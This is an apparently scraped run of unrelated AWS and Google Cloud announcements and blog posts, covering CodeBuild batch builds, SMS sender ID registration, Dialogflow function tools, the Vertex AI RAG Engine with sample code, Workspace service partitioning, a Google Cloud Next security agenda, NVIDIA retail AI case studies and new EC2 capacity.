AWS CodeBuild has expanded its batch build capabilities to include support for reserved capacity fleets and Lambda compute. This enhancement allows you to select a mix of on-demand instances, reserved capacity fleets, or Lambda compute resources for your build batches. AWS CodeBuild is a fully managed continuous integration service that compiles source code, runs tests, and produces software packages ready for deployment.
Batch builds in CodeBuild enable the simultaneous execution of multiple, coordinated builds within a project. This feature is particularly beneficial for developers working on multi-platform projects or those with interdependent build processes. You can define the build sequence using various methods, such as a build list, a build matrix, or a dependency graph of build definitions. CodeBuild then manages the orchestration of these builds, streamlining the overall development and integration process.
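As a quick illustration, the sketch below starts a batch build for an existing project with boto3 and polls its status. The project name is a placeholder, and the batch definition (build list, matrix, or dependency graph) and the compute selection (on-demand, reserved capacity fleet, or Lambda) are assumed to be configured in the project's buildspec and environment settings rather than in this call.

import boto3

codebuild = boto3.client("codebuild", region_name="us-east-1")

# Start a batch build for an existing project; the batch definition and
# compute selection come from the project configuration and buildspec.
response = codebuild.start_build_batch(projectName="my-multi-platform-project")
batch_id = response["buildBatch"]["id"]

# Poll the batch to check the status of the coordinated builds.
batches = codebuild.batch_get_build_batches(ids=[batch_id])
for batch in batches["buildBatches"]:
    print(batch["id"], batch["buildBatchStatus"])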
The new compute options are now available in US East (N. Virginia), US East (Ohio), US West (Oregon), South America (Sao Paulo), Asia Pacific (Singapore), Asia Pacific (Tokyo), Asia Pacific (Sydney), Asia Pacific (Mumbai), Europe (Ireland), and Europe (Frankfurt). For more information about the AWS Regions where CodeBuild is available, see the AWS Regions page.
To learn more about running batch builds in CodeBuild, please visit our documentation. To learn more about how to get started with CodeBuild, visit the AWS CodeBuild product page.
Today, AWS End User Messaging launched self-service Sender ID registrations for 19 additional countries, helping developers correctly configure SMS messaging for their applications. The new countries include Australia, Belarus, Egypt, India, Indonesia, Jordan, Kenya, Kuwait, Kazakhstan, Philippines, Qatar, Russia, Saudi Arabia, Singapore, Sri Lanka, Thailand, Turkey, United Arab Emirates, Vietnam, and Zambia.
Phone numbers and sender IDs act as an extension of a business’s brand, and mobile carriers and governments worldwide have implemented SMS registrations as a form of “know your customer” check to protect end-users from unwanted and spam messages. By registering, application developers ensure a higher level of deliverability and ensure their use-cases comply with local rules and regulations, avoiding message filtering.
Previously, customers needed to open a support case to request these sender IDs; now they can complete registrations themselves via the AWS Management Console or programmatically via the APIs, reducing time to onboard. The registration support is available in all commercial Regions where AWS End User Messaging is generally available.
If you have a website, building engaging experiences that retain existing customers and attract new ones is table stakes. Users want tailored content, but traditional website development tools struggle to keep up with the demand for dynamic, individualized journeys. With Google Gemini and Conversational Agents (Dialogflow CX), you can now build websites that dynamically adapt their content based on what your users are looking for.
In this blog post, you will learn how to:
Create dynamic web pages that respond to users’ intents using Conversational Agents
Use function tools to bridge the gap between conversation intent and web content display
What is a Conversational Agents function tool?
A Conversational Agent function tool is a feature that allows your chatbot to interact with external systems and trigger actions based on user conversations. In this article, we use it to:
Detect user intents from natural language input
Map those intents to specific function tools
Dynamically update the UI based on the conversation flow
Let’s take an example: Retail chatbot
While everyone can benefit from these features, retailers in particular stand to gain from building dynamic web pages with Conversational Agents. We’ll use a retail chatbot use case to demonstrate this tool. Here’s the workflow:
Step 1: Create a function tool
Set up a new Playbook function tool called Load-Swag-Content with the following input/output schemas in YAML format.
# Input format
properties:
  url:
    type: string
    description: the URL for the Swag
required:
  - url
type: object

# Output format
null
Your console should look something like this:
Step 2: Set up a playbook steering agent
Set up a main steering playbook to call the function tool Load-Swag-Content.
Step 3: Create examples to drive Playbook agent behavior.
In this example, when a user asks about “Backpack”, the Playbook agent will call the function tool by passing a backpack-related URL as an argument to the web client.
More information on the web client in the next step.
Step 4: Write web client JavaScript function
This client-side JavaScript function receives the URL from the Load-Swag-Content function tool and updates the HTML iframe accordingly.
We are using an HTML iframe to demonstrate the function calling and parameter passing capabilities. The same concept works across different web frameworks and applications, and developers can be as creative as they want in building custom logic.
Step 5: Register the function tool
Register the Playbook function tool using registerClientSideFunction, which will map the Load-Swag-Content tool with the JavaScript function loadURL.
This is front-end sample code; you need to update configuration values such as YOUR_REGION, YOUR_PROJECT_ID, YOUR_AGENT_ID, and YOUR_TOOL_ID, as well as your custom JavaScript function.
Let’s look at a demo use case for a virtual swag assistant. The customer is greeted at the start of the chat.
When the customer wants to find out more about a Fleece Jacket, the page is dynamically updated to display relevant information.
Next steps
To learn more about Conversational Agent Function tools, check out the following resources and enhance your customer experience with real-time intent-based dynamic web pages.
Get started with Conversational Agent by following the tutorial here
AWS Marketplace has launched email notifications and an Amazon EventBridge event that inform AWS Marketplace selling partners, including ISVs and Channel Partners, when their disbursements have been paused due to invalid bank account information. With this launch, selling partners can be alerted to these events and take immediate action to update their banking details so they receive their disbursements promptly.
Until now, AWS Marketplace selling partners had to check disbursement status in the Insights tab of the AWS Marketplace Management Portal (AMMP). With this release, disbursement-paused events caused by invalid bank accounts are sent to Amazon EventBridge, and AWS Marketplace sellers can subscribe to these events by defining appropriate rule patterns. Each event contains a failure reason, the ARN of the invalid payment instrument, and a link to the remediation steps. The source for these EventBridge events is aws.marketplace and the possible detail-type value is Disbursement Paused.
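As an illustration, here is a minimal boto3 sketch of an EventBridge rule matching these events; the rule name and the SNS topic ARN used as a target are placeholders.

import json
import boto3

events = boto3.client("events")

# Match the disbursement-paused events described above:
# source "aws.marketplace" and detail-type "Disbursement Paused".
pattern = {
    "source": ["aws.marketplace"],
    "detail-type": ["Disbursement Paused"],
}

events.put_rule(
    Name="marketplace-disbursement-paused",
    EventPattern=json.dumps(pattern),
    State="ENABLED",
)

# Route matching events to a notification target; the SNS topic ARN is a placeholder.
events.put_targets(
    Rule="marketplace-disbursement-paused",
    Targets=[{"Id": "notify-finance", "Arn": "arn:aws:sns:us-east-1:111122223333:disbursement-alerts"}],
)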
AWS Compute Optimizer now expands idle and rightsizing recommendations to Amazon EC2 Auto Scaling groups with scaling policies and multiple instance types. With the new recommendations, you can take actions to optimize cost and performance of these groups without requiring specialized knowledge or engineering resources to analyze them.
Compute Optimizer analyzes EC2 Auto Scaling groups’ scaling policies, instance configurations, and utilization metrics to understand their usage patterns and identify opportunities for cost and performance optimization. For EC2 Auto Scaling groups using multiple instance types, Compute Optimizer helps identify the most cost-efficient instance types, enabling you to prioritize them in your groups. When EC2 Auto Scaling groups use scaling policies to scale based on CPU utilization, Compute Optimizer recommends optimizing the CPU-to-memory ratio by considering only instance types with identical vCPU counts. Compute Optimizer also identifies and flags EC2 Auto Scaling groups that demonstrate consistently low CPU and network usage throughout the lookback period as idle, recommending that you scale them down to save costs.
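As a sketch of how you might pull these recommendations programmatically, the following uses the Compute Optimizer API via boto3; treat the response field names as assumptions to verify against the API reference.

import boto3

optimizer = boto3.client("compute-optimizer", region_name="us-east-1")

# Fetch Auto Scaling group recommendations; field names below are assumed
# from the Compute Optimizer API and may need adjusting.
response = optimizer.get_auto_scaling_group_recommendations(maxResults=25)
for rec in response.get("autoScalingGroupRecommendations", []):
    print(rec.get("autoScalingGroupName"), "-", rec.get("finding"))
    for option in rec.get("recommendationOptions", []):
        config = option.get("configuration", {})
        print("  candidate instance type:", config.get("instanceType"))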
This new feature is available in all AWS Regions where AWS Compute Optimizer is available, except the AWS GovCloud (US) and AWS China Regions. To learn more about the new feature updates, please visit Compute Optimizer’s product page and user guide.
Starting today, Amazon Elastic Compute Cloud (Amazon EC2) C8g instances are available in AWS Europe (Ireland) and AWS Europe (Spain) regions. These instances are powered by AWS Graviton4 processors and deliver up to 30% better performance compared to AWS Graviton3-based instances. Amazon EC2 C8g instances are built for general-purpose workloads, such as application servers, microservices, gaming servers, midsize data stores, and caching fleets. These instances are built on the AWS Nitro System, which offloads CPU virtualization, storage, and networking functions to dedicated hardware and software to enhance the performance and security of your workloads.
AWS Graviton4-based Amazon EC2 instances deliver the best performance and energy efficiency for a broad range of workloads running on Amazon EC2. These instances offer larger instance sizes with up to 3x more vCPUs and memory compared to Graviton3-based Amazon C7g instances. AWS Graviton4 processors are up to 40% faster for databases, 30% faster for web applications, and 45% faster for large Java applications than AWS Graviton3 processors. C8g instances are available in 12 different instance sizes, including two bare metal sizes. They offer up to 50 Gbps enhanced networking bandwidth and up to 40 Gbps of bandwidth to the Amazon Elastic Block Store (Amazon EBS).
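If you want to try the new instances in one of these Regions, a minimal boto3 sketch follows; the AMI ID is a placeholder for an arm64 image you have access to.

import boto3

# Launch a single C8g (Graviton4) instance in Europe (Ireland).
ec2 = boto3.client("ec2", region_name="eu-west-1")

response = ec2.run_instances(
    ImageId="ami-0123456789abcdef0",   # placeholder arm64 AMI
    InstanceType="c8g.xlarge",
    MinCount=1,
    MaxCount=1,
)
print(response["Instances"][0]["InstanceId"])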
Closing the gap between impressive model demos and real-world performance is crucial for successfully deploying generative AI in the enterprise. Despite the technology’s incredible capabilities, this perceived gap may be a barrier for many developers and enterprises trying to “productionize” AI. This is where retrieval-augmented generation (RAG) becomes non-negotiable: it strengthens your enterprise applications by building trust in their AI outputs.
Today, we’re announcing the general availability of Vertex AI RAG Engine, a fully managed service that helps you build and deploy RAG implementations with your own data and methods. With Vertex AI RAG Engine, you can:
Adapt to any architecture: Choose the models, vector databases, and data sources that work best for your use case. This flexibility ensures RAG Engine fits into your existing infrastructure rather than forcing you to adapt to it.
Evolve with your use case: Adding new data sources, updating models, or adjusting retrieval parameters happens through simple configuration changes. The system grows with you, maintaining consistency while accommodating new requirements.
Evaluate in simple steps: Set up multiple RAG engines with different configurations to find what works best for your use case.
Introducing Vertex AI RAG Engine
Vertex AI RAG Engine is a managed service that lets you build and deploy RAG implementations with your data and methods. Think of it as having a team of experts who have already solved complex infrastructure challenges such as efficient vector storage, intelligent chunking, optimal retrieval strategies, and precise augmentation — all while giving you the controls to customize for your specific use case.
Vertex AI’s RAG Engine offers a vibrant ecosystem with a range of options catering to diverse needs.
DIY capabilities: DIY RAG empowers users to tailor their solutions by mixing and matching different components. It works well for low- to medium-complexity use cases, with an easy-to-get-started API that enables fast experimentation, proofs of concept, and RAG-based applications with just a few clicks.
Search functionality: Vertex AI Search stands out as a robust, fully managed solution. It supports a wide variety of use cases, from simple to complex, with high out-of-the-box quality, an easy getting-started experience, and minimal maintenance.
Connectors: A rapidly growing list of connectors helps you quickly connect to various data sources, including Cloud Storage, Google Drive, Jira, Slack, or local files. RAG Engine handles the ingestion process (even for multiple sources) through an intuitive interface.
Customization
One of the defining strengths of Vertex AI’s RAG Engine is its capacity for customization. This flexibility allows you to fine-tune various components to perfectly align with your data and use case.
Parsing: When documents are ingested into an index, they are split into chunks. RAG Engine lets you tune the chunk size and chunk overlap, and offers different chunking strategies to support different types of documents (see the ingestion sketch after this list).
Retrieval: You might already be using Pinecone, or perhaps you prefer the open-source capabilities of Weaviate. Maybe you want to leverage Vertex AI Vector Search or our managed vector database. RAG Engine works with your choice or, if you prefer, can manage the vector storage entirely for you. This flexibility ensures you’re never locked into a single approach as your needs evolve.
Generation: You can choose from hundreds of LLMs in Vertex AI Model Garden, including Google’s Gemini, Llama and Claude.
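To make the parsing controls above concrete, here is a minimal ingestion sketch using the Vertex AI SDK. The Cloud Storage path and corpus display name are placeholders, and the chunking parameter names may differ slightly between SDK versions, so verify them against the version you have installed.

from vertexai.preview import rag
import vertexai

vertexai.init(project="PROJECT_ID", location="us-central1")

corpus = rag.create_corpus(display_name="product-docs")  # placeholder name

# Ingest files from Cloud Storage and tune how they are chunked before
# embedding; chunk_size/chunk_overlap names are assumptions to verify.
rag.import_files(
    corpus.name,
    paths=["gs://my-bucket/docs/"],   # placeholder bucket path
    chunk_size=512,      # tokens per chunk
    chunk_overlap=100,   # overlap between consecutive chunks
)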
Use Vertex AI RAG as a tool in Gemini
Vertex AI’s RAG Engine is natively integrated with the Gemini API as a tool. You can create grounded conversations that use RAG to provide contextually relevant answers. Simply initialize a RAG retrieval tool, configured with settings such as the number of documents to retrieve and whether to use an LLM-based ranker. This tool is then passed to a Gemini model.
from vertexai.preview import rag
from vertexai.preview.generative_models import GenerativeModel, Tool
import vertexai

PROJECT_ID = "PROJECT_ID"
CORPUS_NAME = "projects/{PROJECT_ID}/locations/LOCATION/ragCorpora/RAG_CORPUS_RESOURCE"
MODEL_NAME = "MODEL_NAME"

# Initialize Vertex AI API once per session
vertexai.init(project=PROJECT_ID, location="LOCATION")

config = vertexai.preview.rag.RagRetrievalConfig(
    top_k=10,
    ranking=rag.Ranking(
        llm_ranker=rag.LlmRanker(
            model_name=MODEL_NAME
        )
    )
)

rag_retrieval_tool = Tool.from_retrieval(
    retrieval=rag.Retrieval(
        source=rag.VertexRagStore(
            rag_resources=[
                rag.RagResource(
                    rag_corpus=CORPUS_NAME,
                )
            ],
            rag_retrieval_config=config
        ),
    )
)

rag_model = GenerativeModel(
    model_name=MODEL_NAME, tools=[rag_retrieval_tool]
)
response = rag_model.generate_content("Why is the sky blue?")
print(response.text)
# Example response:
# The sky appears blue due to a phenomenon called Rayleigh scattering.
# Sunlight, which contains all colors of the rainbow, is scattered
# by the tiny particles in the Earth's atmosphere...
Use Vertex AI Search as a retriever
Vertex AI Search provides a solution for retrieving and managing data within your Vertex AI RAG applications. By using Vertex AI Search as your retrieval backend, you can improve performance, scalability, and ease of integration.
Enhanced performance and scalability: Vertex AI Search is designed to handle large volumes of data with exceptionally low latency. This translates to faster response times and improved performance for your RAG applications, especially when dealing with complex or extensive knowledge bases.
Simplified data management: Import your data from various sources, such as websites, BigQuery datasets, and Cloud Storage buckets, which can streamline your data ingestion process.
Seamless integration: Vertex AI provides built-in integration with Vertex AI Search, which lets you select Vertex AI Search as the corpus backend for your RAG application. This simplifies the integration process and helps to ensure optimal compatibility between components.
Improved LLM output quality: By using the retrieval capabilities of Vertex AI Search, you can help to ensure that your RAG application retrieves the most relevant information from your corpus, which leads to more accurate and informative LLM-generated outputs.
from vertexai.preview import rag
import vertexai

PROJECT_ID = "PROJECT_ID"
DISPLAY_NAME = "DISPLAY_NAME"
ENGINE_NAME = "ENGINE_NAME"

# Initialize Vertex AI API once per session
vertexai.init(project=PROJECT_ID, location="us-central1")

# Create a corpus
vertex_ai_search_config = rag.VertexAiSearchConfig(
    serving_config=f"{ENGINE_NAME}/servingConfigs/default_search",
)

rag_corpus = rag.create_corpus(
    display_name=DISPLAY_NAME,
    vertex_ai_search_config=vertex_ai_search_config,
)

# Check the corpus just created
new_corpus = rag.get_corpus(name=rag_corpus.name)
print(new_corpus)
Cloud applications like Google Workspace provide benefits such as collaboration, availability, security, and cost-efficiency. However, for cloud application developers, there’s a fundamental conflict between achieving high availability and the constant evolution of cloud applications. Changes to the application, such as new code, configuration updates, or infrastructure rearrangements, can introduce bugs and lead to outages. These risks pose a challenge for developers, who must balance stability and innovation while minimizing disruption to users.
Here on the Google Workspace Site Reliability Engineering team, we once moved a replica of Google Docs to a new data center because we needed extra capacity. But moving the associated data, which was vast, overloaded a key index in our database, restricting users’ ability to create new docs. Thankfully, we were able to identify the root cause and mitigate the problem quickly. Still, this experience convinced us of the need to reduce the risk of a global outage from a simple application change.
Limit the blast radius
Our approach to reducing the risk of global outages is to limit the “blast radius,” or extent, of an outage by vertically partitioning the serving stack. The basic idea is to run isolated instances (“partitions”) of application servers and storage (Figure 1). Each partition contains all the various servers necessary to service a user request from end to end. Each production partition also has a pseudo-random mix of users and workloads, so all the partitions have similar resource needs. When it comes time to make changes to the application code, we deploy new changes to one partition at a time. Bad changes may cause a partition-wide outage, but we are protected from a global application outage.
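To make the idea concrete, here is a minimal sketch of sticky, pseudo-random partition assignment by hashing user IDs. It illustrates the concept only; it is not Google's actual implementation, and the partition count is arbitrary.

import hashlib

NUM_PARTITIONS = 16

def partition_for(user_id: str) -> int:
    """Sticky, pseudo-random assignment: the same user always hashes to the
    same partition, and users spread roughly evenly across partitions."""
    digest = hashlib.sha256(user_id.encode("utf-8")).digest()
    return int.from_bytes(digest[:8], "big") % NUM_PARTITIONS

# A rollout then proceeds one partition at a time, e.g. partition 0 first.
print(partition_for("alice@example.com"))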
Compare this approach to using canarying alone, in which new features or code changes are released to a small group of users before rolling them out to the rest. While canarying deploys changes first to just a few servers, it doesn’t prevent problems from spreading. For example, we’ve had incidents where canaried changes corrupted data used by all the servers in the deployment. With partitioning, the effects of bad changes are isolated to a single partition, preventing such contagion. Of course, in practice, we combine both techniques: canarying new changes to a few servers within a single partition.
Benefits of partitioning
Broadly speaking, partitioning brings a lot of advantages:
Availability: Initially, the primary motivation for partitioning was to improve the availability of our services and avoid global outages. In a global outage, an entire service may be down (e.g., users cannot log into Gmail) or a critical user journey may be broken (e.g., users cannot create Calendar events); both are obviously outcomes to be avoided.
Still, the reliability benefits of partitioning can be hard to quantify; global outages are relatively infrequent, so if you don’t have one for a while, it may be due to partitioning, or may be due to luck. That said, we’ve had several outages that were confined to a single partition, and believe they would have expanded into global outages without it.
Flexibility: We evaluate many changes to our systems by experimenting with data. Many user-facing experiments, such as a change to a UI element, can use discrete groups of users; experiments that change backend or storage behavior, however, are much easier to evaluate per partition. For example, in Gmail we can choose an on-disk layout that stores the message bodies of emails inline with the message metadata, or a layout that separates them into different disk files. The right decision depends on subtle aspects of the workload: separating message metadata and bodies may reduce latency for some user interactions, but requires more compute resources in our backend servers to perform joins between the body and metadata columns. With partitioning, we can easily evaluate the impact of these choices in contained, isolated environments.
Data location: Google Workspace lets enterprise customers specify that their data be stored in a specific jurisdiction. In our previous, non-partitioned architecture, such guarantees were difficult to provide, especially since services were designed to be globally replicated to reduce latency and take advantage of available capacity.
Challenges
Despite the benefits, there are some challenges to adopt partitioning. In some cases, these challenges make it hard or risky to move from a non-partitioned to a partitioned setup. In other cases, challenges persist even after partitioning. Here are the issues as we see them:
Not all data models are easy to partition: For example, Google Chat needs to assign both users and chat rooms to partitions. Ideally, a chat room and its members would be in a single partition to avoid cross-partition traffic. However, in practice, this is difficult to accomplish. Chat rooms and users form a graph, with users in many chat rooms and chat rooms containing many users. In the worst case, this graph may have only a single connected component, so that every user and chat room is transitively linked to every other. If we were to slice the graph into partitions, we could not guarantee that all users would be in the same partition as their chat rooms.
Partitioning a live service requires care: Most of our services pre-date partitioning. As a result, adopting partitioning means taking a live service and changing its routing and storage setup. Even if the end goal is higher reliability, making these kinds of changes in a live system is often the source of outages, and can be risky.
Partition misalignment between services: Our services often communicate with each other. For example, if a new person is added to a Calendar event, Calendar servers make a Remote Procedure Call (RPC) to Gmail delivery servers to send the new invitee an email notification. Similarly, Calendar events with video call links require Calendar to talk to Meet servers for a meeting ID. Ideally, we would get the benefits of partitioning even across services. However, aligning partitions between services is difficult. The main reason is that different services tend to use different entity types when determining which partition to use. For example, Calendar partitions on the owner of the calendar while Meet partitions on meeting ID. The result is that there is no clear mapping from partitions in one service to another.
Partitions are smaller than the service: A modern cloud application is served by hundreds or thousands of servers. We run servers at less than full utilization so that we can tolerate spikes in traffic, and because servers that are saturated with traffic generally perform poorly. If we have 500 servers and target each at 60% CPU utilization, we effectively have 200 spare servers to absorb load spikes. Because we do not fail over between partitions, each partition has access to a much smaller amount of spare capacity. In a non-partitioned setup, a few server crashes are likely to go unnoticed, since there is enough headroom to absorb the lost capacity. But in a smaller partition, these crashes may account for a non-trivial portion of the available server capacity, and the remaining servers may become overloaded.
Key takeaways
We can improve the availability of web applications by partitioning their serving stacks. These partitions are isolated, because we do not fail over between them. Users and entities are assigned to partitions in a sticky manner to allow us to roll out changes in order of risk tolerance. This approach allows us to roll out changes one partition at a time with confidence that bad changes will only affect a single partition, and ideally that partition contains only users from your organization.
In short, partitioning supports our efforts to provide stronger and more reliable services to our users, and it might apply to your service as well. For example, you can improve the availability of your application by using Spanner, which provides geo-partitioning out of the box. Read more about geo-partitioning best practices here.
Few things are more critical to IT operations than security. Security incidents, coordinated threat actors, and regulatory mandates come on top of the imperative to effectively manage risk and the vital business task of rolling out generative AI. That’s why at Google Cloud Next 2025 we are creating an in-depth security experience to show you all the ways that you can make Google part of your security team and advance your innovation agenda with confidence.
Let’s see why Google Cloud Next is shaping up to be a must-attend event for security experts and the security-curious alike.
What’s in store for you
Here are some of the opportunities you’ll have to interact with Google’s security experts and security technology:
Our massive Security Lounge, a dedicated area of the expo where you can meet the security leaders engineering Google Cloud’s secure by design platform and products, and experience product demos spanning Google Cloud’s security portfolio. Get all your burning product questions answered and provide direct input to the teams who build them.
An interactive Security Operations Center to experience the power of Google Security Operations from the eyes of both defender and adversary. See first-hand how Google equips cybersecurity teams with the data, AI, and scalable analytics to detect and remediate today’s most sophisticated attacks.
At the Mandiant Threat Space, you’ll be able to hear and learn directly from frontline defenders and incident responders who battle advanced threats and defend critical infrastructure around the world.
The Securing AI experience demonstrates how Google Cloud products and expertise can help you manage AI risk, from creation to consumption: inventory your AI assets, safeguard your AI systems, and respond to threats.
Our Capture the Flag challenge, where you can test and hone your cybersecurity skills. This exercise will use real-world data, including Cybersecurity and Infrastructure Security Agency (CISA) advisories, ransom notes, and information from the dark web, to simulate a real-world threat hunt. Navigate clues, analyze evidence, and solve puzzles to capture the flags and best the competition.
Security tabletop exercises where participants role-play and analyze aspects of a hypothetical but realistic cybersecurity incident, such as a data breach or ransomware attack. Gain insight into how your organization is likely to perform during incidents before they happen and learn best practices for handling these incredibly challenging situations that you can take back to your organization.
Birds of a Feather sessions for insightful discussions on key cloud security topics. These are unique opportunities to connect with peers, share your cybersecurity expertise and solve problems with the help of the Google Cloud Security community.
Security breakout sessions
If you’ve attended Next in the past, you know that breakouts are also core to our program. We’ll have more than 40 security breakout sessions covering today’s pressing security topics including cloud security and governance, frontline threat intelligence, enterprise compliance and resilience, AI risk management, and incident response.
Here’s a sneak peek at some of the key breakout sessions on the agenda:
Securing your AI deployments, from creation to consumption: Learn how to build secure AI systems from the ground up and protect your AI models from attacks.
Route, reduce, redact: Managing your security data pipeline: Dive into the new data pipeline management capabilities of Google SecOps and learn how to transform security data to manage scale, reduce costs, and satisfy compliance mandates.
Got identity? Learn to love IAM: Master Identity and Access Management (IAM) to control access to your cloud resources and prevent unauthorized access.
Stop data exfiltration with cloud-first security controls: Discover how to prevent sensitive data from leaving your organization’s control.
Unlocking OT security: Threat intelligence for critical industries: Learn how advanced threat intelligence enables organizations to move from reactive to proactive defense strategies.
AI security and APIs: Addressing the OWASP top 10 LLM and API risks: Understand the top security risks for large language models (LLMs) and APIs, and learn how to mitigate them.
Strengthen cloud security posture, detect threats, and mitigate risks with Security Command Center: Use Google Cloud’s Security Command Center to gain comprehensive visibility into your security posture and respond to threats effectively.
Best practices for SIEM migration and ditching dinosaurs: In this panel, experts will share insights and best practices from their own SIEM migration journeys.
Keep AI secrets safe with Confidential Computing: Explore confidential computing techniques to protect your sensitive data and AI models in use.
Protect Internet-facing web, API, and gen AI services from attacks: Secure your web applications, APIs, and generative AI services from a wide range of threats.
There’s no place like Chrome for advanced data protection and threat intelligence: Learn how Chrome’s security features can protect your users and your organization from cyberattacks.
Dedicated security executive program
Our CISO Connect for Leaders is dedicated programming designed to equip CISOs and other security leaders with insights and strategies they need to navigate the evolving threat landscape and build a security-first culture. If you would like to be considered for participation in this executive program at Next ‘25, contact your Google Cloud account representative.
Don’t miss out
Next ‘25 is the ideal opportunity for everyone in your organization to learn about how Google Cloud can help keep them safe as they move forward in the AI era. You can also earn continuing professional education credits for your certifications.
Next ’25 will take place at the Mandalay Bay Convention Center in Las Vegas, April 9 to 11, 2025. Early bird pricing is available for $999 — but space is limited, so register soon.
Elevate your security game at Next ’25. Register today, and stay tuned for more updates and information on our security programming.
Retailers have always moved quickly to connect customers with the latest merchandise. And just as they carefully design every inch of their stores, the time and thought that go into their IT infrastructure are now just as important in the era of omnichannel shopping.
As retail organizations increasingly adopt AI foundation models and other AI technologies to improve the shopping journey, robust infrastructure becomes paramount. Retailers need to be able to develop AI applications and services quickly, reliably, robustly, and affordably, and with support from Google Cloud and NVIDIA, leading companies are already accelerating their time to market and achieving scalable costs as they move AI from pilots into production.
Google Cloud has worked with NVIDIA to empower retailers to boost their customer engagements in exciting new ways, deliver more hyper-personalized recommendations, and build their own AI applications and agents; we’ve also integrated prebuilt generative AI agents for customer service to drive immediate savings. With the NVIDIA AI Enterprise software platform available on the Google Cloud Marketplace, retailers can streamline AI development and deployment through scalable NVIDIA infrastructure running on Google Cloud.
And now, retailers can also leverage NVIDIA NIM microservices, part of NVIDIA AI Enterprise and available on Google Kubernetes Engine (GKE), to deploy generative AI models at scale, optimize inference, and handle large volumes of inquiries at reduced cost.
Retail customers and partners are combining Google Cloud with NVIDIA AI Enterprise to unlock AI transformation at scale.
Reduce Costs and Enhance Customer Satisfaction: LiveX AI stands at the cutting edge of generative AI technology, building custom, multimodal AI agents that can deliver truly human-like customer experiences. Google Cloud and LiveX AI collaborated to help jumpstart LiveX AI’s development, using Google Kubernetes Engine (GKE) and NVIDIA AI Enterprise. In a matter of three weeks, LiveX AI and Google Cloud worked together to deliver a custom solution for its client, resulting in a reduction in customer support costs by up to 85%.
“NVIDIA’s software on Google Cloud brings two of the best technology leaders together. NVIDIA’s easy-to-use NIM microservices, available on Google Cloud, are secure and reliable, and help deploy high-performance AI model inference more quickly and affordably. NVIDIA NIM microservices and GPUs on GKE accelerated LiveX AI Agent’s average answer/response generation speed by 6.1x, enabling real-time, human-like interactions for customer support, shopping assistance, and product education, boosting growth, retention and customer experience.” – Jia Li, Co-Founder, Chief AI Officer, LiveX AI
Improve responsiveness: AI techniques like text embedding and vector databases help retailers make more relevant recommendations by using more data, but they can also slow the experience down. The in-house engineering and data science organization at a top-5 U.S. grocer collaborated with Google and NVIDIA to optimize models for better performance.
By using NVIDIA AI Enterprise software’s performance and caching improvements in its Vertex AI endpoint, the grocer cut inference time from several seconds to just 100 milliseconds, without changing the model. This now makes large-scale, real-time personalization possible. Learn more about the benefits of combining Google Cloud Vertex AI Platform and NVIDIA AI Enterprise software.
In-store analytics & innovation: AI is advancing how brick-and-mortar stores understand customer engagement, creating new opportunities to personalize the shopper journey. Standard.ai is accelerated by NVIDIA Metropolis, also available with NVIDIA AI Enterprise on the Google Cloud Marketplace, giving retailers and consumer goods companies precise visualization of customer journeys and creating actionable insights by analyzing, in real time, factors such as dwell time, shopper orientation, proximity, and engagement with products, ads, and high-impact zones.
“The NVIDIA Metropolis platform and DeepStream software development kit have enabled us to seamlessly deploy our video pipelines across Google Cloud data centers and on-prem GPUs, and, in combination with model optimizations through the NVIDIA TensorRT ecosystem of application programming interfaces, we have cut our image preprocessing time to one-third, significantly reducing our infrastructure footprint.” – David Woolard, Chief Technology Officer, Standard.ai
Accelerate AI transformation
Influenced by the rapid advancements of AI, the retail landscape is evolving faster than ever. For retailers looking to stay on the cutting edge, the collaboration between Google Cloud and NVIDIA continues to offer access to the latest in AI models, infrastructure, platforms that ensure scalability, and development tools all in an environment that’s built on responsible AI practices and best-in-class security.
Today, AWS announces the general availability of a new AWS Local Zone in New York City, supporting a wide range of workloads at the edge. This new Local Zone offers Amazon Elastic Compute Cloud (Amazon EC2) C7i, R7i, M6i, and M6in instances and Amazon Elastic Block Store (Amazon EBS) volume types gp2, gp3, io1, sc1, and st1. You can also access Amazon Elastic Container Service (Amazon ECS), Amazon Elastic Kubernetes Service (Amazon EKS), Application Load Balancer, AWS Direct Connect, and the microsecond-accurate time of Amazon Time Sync in this new Local Zone to support your workloads at the edge.
Local Zones are an AWS infrastructure deployment that places compute, storage, database, and other select services closer to large population, industry, and IT centers where no AWS Region exists. You can use Local Zones to run applications that require single-digit millisecond latency for use cases such as real-time gaming, hybrid migrations, media and entertainment content creation, live video streaming, engineering simulations, financial services payment processing, capital market operations, and AR/VR.
Local Zones are available in the US in 17 metro areas and globally in an additional 17 metro areas, allowing you to deliver low-latency applications to end users worldwide. For more information about where other Local Zones are available, visit Local Zones locations.
You can enable the new Local Zone in New York City from the Zones tab in the Amazon EC2 console settings or the ModifyAvailabilityZoneGroup API. Check out Local Zones pricing for information on Amazon EC2 instances available as On-Demand Instances, Spot Instances, or part of Savings Plans in the new Local Zone in New York City. To learn more, visit Local Zones.
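For example, a minimal boto3 sketch for opting in to the zone group follows; the group name shown is a placeholder, so confirm the exact name in the Zones tab or via describe_availability_zones.

import boto3

# Opt in to the Local Zone group from the parent Region (us-east-1).
ec2 = boto3.client("ec2", region_name="us-east-1")

ec2.modify_availability_zone_group(
    GroupName="us-east-1-nyc-1",   # placeholder; use the group name shown in the Zones tab
    OptInStatus="opted-in",
)

# Confirm the zone is now available to the account.
zones = ec2.describe_availability_zones(AllAvailabilityZones=True)
for zone in zones["AvailabilityZones"]:
    if zone["ZoneType"] == "local-zone" and "nyc" in zone["ZoneName"]:
        print(zone["ZoneName"], zone["OptInStatus"])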
Starting today, Amazon Elastic Compute Cloud (Amazon EC2) C7i instances powered by custom 4th Gen Intel Xeon Scalable processors (code-named Sapphire Rapids) are available in the AWS GovCloud (US-West) Region. These custom processors, available only on AWS, offer up to 15% better performance over comparable x86-based Intel processors utilized by other cloud providers.
C7i instances deliver up to 15% better price-performance versus C6i instances and are a great choice for all compute-intensive workloads, such as batch processing, distributed analytics, ad-serving, and video encoding. C7i instances offer larger instance sizes, up to 48xlarge, and two bare metal sizes (metal-24xl, metal-48xl). These bare-metal sizes support built-in Intel accelerators: Data Streaming Accelerator, In-Memory Analytics Accelerator, and QuickAssist Technology that are used to facilitate efficient offload and acceleration of data operations and optimize performance for workloads.
C7i instances also support new Intel Advanced Matrix Extensions (AMX) that accelerate matrix multiplication operations for applications such as CPU-based ML. Customers can attach up to 128 EBS volumes to a C7i instance vs. up to 28 EBS volumes to a C6i instance. This allows you to process larger amounts of data, scale workloads, and improve performance over C6i instances. To learn more, visit the EC2 C7i instances page.
